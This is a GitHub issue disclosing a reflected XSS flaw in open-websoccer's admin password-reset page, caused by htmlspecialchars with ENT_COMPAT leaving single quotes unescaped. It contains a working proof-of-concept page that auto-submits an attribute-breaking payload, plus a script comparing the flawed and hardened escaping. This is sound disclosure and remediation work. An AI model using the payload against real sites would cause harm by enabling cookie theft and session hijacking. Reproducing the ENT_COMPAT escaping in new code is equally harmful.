
An XSS vulnerability #131

Open

LioTree opened this issue May 3, 2024 · 1 comment

Comments

@LioTree

LioTree commented May 3, 2024

Hi, there is an XSS vulnerability in websoccer/admin/forgot-password.php. At line 129, the $_POST['inputEmail'] is inserted into the value attribute of an <input> tag and is escaped by escapeOutput, which actually employs htmlspecialchars($message, ENT_COMPAT, 'UTF-8') at line 30 of websoccer/admin/functions.inc.php. However, htmlspecialchars doesn't escape ' without the ENT_QUOTES flag. Therefore, an attacker can still exploit this by using ' to break out of the value attribute and inject other attributes containing malicious JavaScript code. This allows attackers to obtain the cookies of the administrator and other users and fake their login using the obtained cookies.

```php
$inputEmail = (isset($_POST['inputEmail'])) ? trim($_POST['inputEmail']) : FALSE;
// ......
<input type='email' name='inputEmail' id='inputEmail' placeholder='E-Mail' value='<?php echo escapeOutput($inputEmail); ?>'>
```

```php
/**
 * Escapes for HTML output. Uses <code>htmlspecialchars</code> (UTF-8).
 *
 * @param string $message message string to escape.
 * @return string escaped input string, ready for secure HTML output.
 */
function escapeOutput($message) {
	return htmlspecialchars($message, ENT_COMPAT, 'UTF-8');
}
```

The POC is as follows:

Create a malicious webpage designed to inject JavaScript code into the target page (http://xxxx/admin/forgot-password.php):

```html
<html>
<head>
    <script>
        window.onload = function() {
            document.getElementById("postsubmit").click();
        }
    </script>
</head>

<body>
    <form method="post" action="http://localhost/open-websoccer/websoccer/admin/forgot-password.php">
        <input id="xssr_in" type="text" style="display:none" name="inputEmail" value="' onfocus=alert(1) autofocus '" />
        <div style="display:none;"><input id="postsubmit" type="submit" name="submit" value="submit" /></div>
    </form>
</body>
</html>
```

When the victim visits this malicious page, the JavaScript code will be executed under the target page.

[screenshot attachment]
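As an added example, not code from the open-websoccer project or from the reporter, the following PHP script places a copy of the reported escaping function beside a hardened variant and runs both over the attribute-breaking value quoted in the report. The names `escapeOutput_vulnerable`, `escapeOutputSafe` and `isAttributeSafe` are assumptions made for this illustration; the sample input is constructed.

```php
<?php
// Added example (not project code): ENT_COMPAT vs ENT_QUOTES in htmlspecialchars.

// Mirrors the function reported in the issue. ENT_COMPAT converts only
// double quotes, so a single quote passes through unchanged and can close
// a single-quoted attribute such as value='...'.
function escapeOutput_vulnerable($message) {
    return htmlspecialchars($message, ENT_COMPAT, 'UTF-8');
}

// Hardened variant (hypothetical name): ENT_QUOTES converts both ' and ",
// so the result is safe inside single- or double-quoted attributes.
// ENT_SUBSTITUTE replaces invalid UTF-8 sequences instead of returning an
// empty string, which would otherwise silently blank the field.
function escapeOutputSafe($message) {
    return htmlspecialchars((string) $message, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Check for text destined for a quoted HTML attribute: true only when
// neither quote character survives escaping, i.e. the attribute cannot
// be terminated early by the value.
function isAttributeSafe($escaped) {
    return strpos($escaped, "'") === false && strpos($escaped, '"') === false;
}

// Constructed sample: the attribute-breaking value from the report.
$sample = "' onfocus=alert(1) autofocus '";

$vuln = escapeOutput_vulnerable($sample);
$safe = escapeOutputSafe($sample);

// Render each result in the same single-quoted attribute context used by
// forgot-password.php so the difference is visible in the emitted markup.
echo "ENT_COMPAT : <input value='" . $vuln . "'>\n";
echo "ENT_QUOTES : <input value='" . $safe . "'>\n";

// The first result still contains raw single quotes; the second does not.
var_dump(isAttributeSafe($vuln));
var_dump(isAttributeSafe($safe));
```

Since PHP 8.1 the default flags of `htmlspecialchars` already include `ENT_QUOTES`, but passing `ENT_COMPAT` explicitly, as the reported function does, overrides that default, so upgrading PHP alone does not close the issue. Switching the flag to `ENT_QUOTES` (or wrapping every attribute in double quotes, which `ENT_COMPAT` does escape) removes the attribute break-out; the flag change is the more robust fix because it does not depend on every template author choosing the right quote character.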

@SulivanM

Wow, we can make a pull request but it's better to work on a new version with the Laravel framework for example x)
